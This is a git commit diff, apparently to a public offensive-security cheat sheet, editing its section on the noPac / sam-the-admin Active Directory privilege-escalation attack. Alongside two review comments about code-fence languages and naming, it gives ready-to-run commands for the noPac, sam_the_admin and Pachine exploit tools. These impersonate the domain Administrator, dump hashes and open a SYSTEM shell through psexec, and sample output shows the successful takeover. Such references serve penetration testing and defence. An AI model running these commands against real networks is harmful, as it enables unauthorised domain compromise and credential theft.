Github Pages Trigger

Swissky 2023-02-11 20:22:28 +01:00
parent 2089c5efb1
commit c08949fdc2


@ -842,15 +842,19 @@ cme smb -u user -p password -d domain.local -M webdav [TARGET]
Automated exploitation: Automated exploitation:
* [noPac - @cube0x0](https://github.com/cube0x0/noPac) * [cube0x0/noPac](https://github.com/cube0x0/noPac) - Windows
```powershell ```powershell
noPac.exe scan -domain htb.local -user user -pass 'password123' noPac.exe scan -domain htb.local -user user -pass 'password123'
noPac.exe -domain htb.local -user domain_user -pass 'Password123!' /dc dc.htb.local /mAccount demo123 /mPassword Password123! /service cifs /ptt noPac.exe -domain htb.local -user domain_user -pass 'Password123!' /dc dc.htb.local /mAccount demo123 /mPassword Password123! /service cifs /ptt
noPac.exe -domain htb.local -user domain_user -pass "Password123!" /dc dc.htb.local /mAccount demo123 /mPassword Password123! /service ldaps /ptt /impersonate Administrator noPac.exe -domain htb.local -user domain_user -pass "Password123!" /dc dc.htb.local /mAccount demo123 /mPassword Password123! /service ldaps /ptt /impersonate Administrator
``` ```
* [sam_the_admin - @WazeHell](https://github.com/WazeHell/sam-the-admin) * [Ridter/noPac](https://github.com/Ridter/noPac) - Linux
```ps1
python noPac.py 'domain.local/user' -hashes ':31d6cfe0d16ae931b73c59d7e0c089c0' -dc-ip 10.10.10.10 -use-ldap -dump
```
* [WazeHell/sam-the-admin](https://github.com/WazeHell/sam-the-admin)
```ps1 ```ps1
$ python3 sam_the_admin.py "caltech/alice.cassie:Lee@tPass" -dc-ip 192.168.1.110 -shell $ python3 sam_the_admin.py "domain/user:password" -dc-ip 10.10.10.10 -shell
[*] Selected Target dc.caltech.white [*] Selected Target dc.caltech.white
[*] Total Domain Admins 11 [*] Total Domain Admins 11
[*] will try to impersonat gaylene.dreddy [*] will try to impersonat gaylene.dreddy
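Review bot: The new Ridter/noPac entry is labelled Linux, but its example is fenced as `ps1` even though the line is a `python noPac.py ...` invocation; a `bash` fence would match the platform label. In the sam-the-admin example the command now uses the generic `domain/user:password` and `-dc-ip 10.10.10.10`, while the sample output under it still reads `Selected Target dc.caltech.white`, so the command and its output no longer belong to the same run; either keep the original command line or note that the output is from a different environment. The cube0x0 and Ridter entries gained a platform suffix, but the WazeHell entry did not, so the list is only partly normalised.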
@ -871,15 +875,15 @@ Automated exploitation:
C:\Windows\system32>whoami C:\Windows\system32>whoami
nt authority\system nt authority\system
``` ```
* [Pachine - @ly4k](https://github.com/ly4k/Pachine) * [ly4k/Pachine](https://github.com/ly4k/Pachine)
```powershell ```powershell
usage: pachine.py [-h] [-scan] [-spn SPN] [-impersonate IMPERSONATE] [-domain-netbios NETBIOSNAME] [-computer-name NEW-COMPUTER-NAME$] [-computer-pass password] [-debug] [-method {SAMR,LDAPS}] [-port {139,445,636}] [-baseDN DC=test,DC=local] usage: pachine.py [-h] [-scan] [-spn SPN] [-impersonate IMPERSONATE] [-domain-netbios NETBIOSNAME] [-computer-name NEW-COMPUTER-NAME$] [-computer-pass password] [-debug] [-method {SAMR,LDAPS}] [-port {139,445,636}] [-baseDN DC=test,DC=local]
[-computer-group CN=Computers,DC=test,DC=local] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] -dc-host hostname [-dc-ip ip] [-computer-group CN=Computers,DC=test,DC=local] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] -dc-host hostname [-dc-ip ip]
[domain/]username[:password] [domain/]username[:password]
$ python3 pachine.py -dc-host dc.predator.local -scan 'predator.local/john:Passw0rd!' $ python3 pachine.py -dc-host dc.domain.local -scan 'domain.local/john:Passw0rd!'
$ python3 pachine.py -dc-host dc.predator.local -spn cifs/dc.predator.local -impersonate administrator 'predator.local/john:Passw0rd!' $ python3 pachine.py -dc-host dc.domain.local -spn cifs/dc.domain.local -impersonate administrator 'domain.local/john:Passw0rd!'
$ export KRB5CCNAME=$PWD/administrator@predator.local.ccache $ export KRB5CCNAME=$PWD/administrator@domain.local.ccache
$ impacket-psexec -k -no-pass 'predator.local/administrator@dc.predator.local' $ impacket-psexec -k -no-pass 'domain.local/administrator@dc.domain.local'
``` ```
**Mitigations**: **Mitigations**:
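Review bot: The Pachine block keeps its `powershell` fence although every command in it is a POSIX shell line (`$ python3 pachine.py ...`, `export KRB5CCNAME=...`, `impacket-psexec`); since this hunk already touches those lines to replace `predator.local` with `domain.local`, switching the fence to `bash` here would fix the highlighting in the same pass. The renamed link `ly4k/Pachine` also has no platform suffix, unlike the cube0x0 and Ridter entries changed earlier in this commit, so the naming convention is applied unevenly across the list.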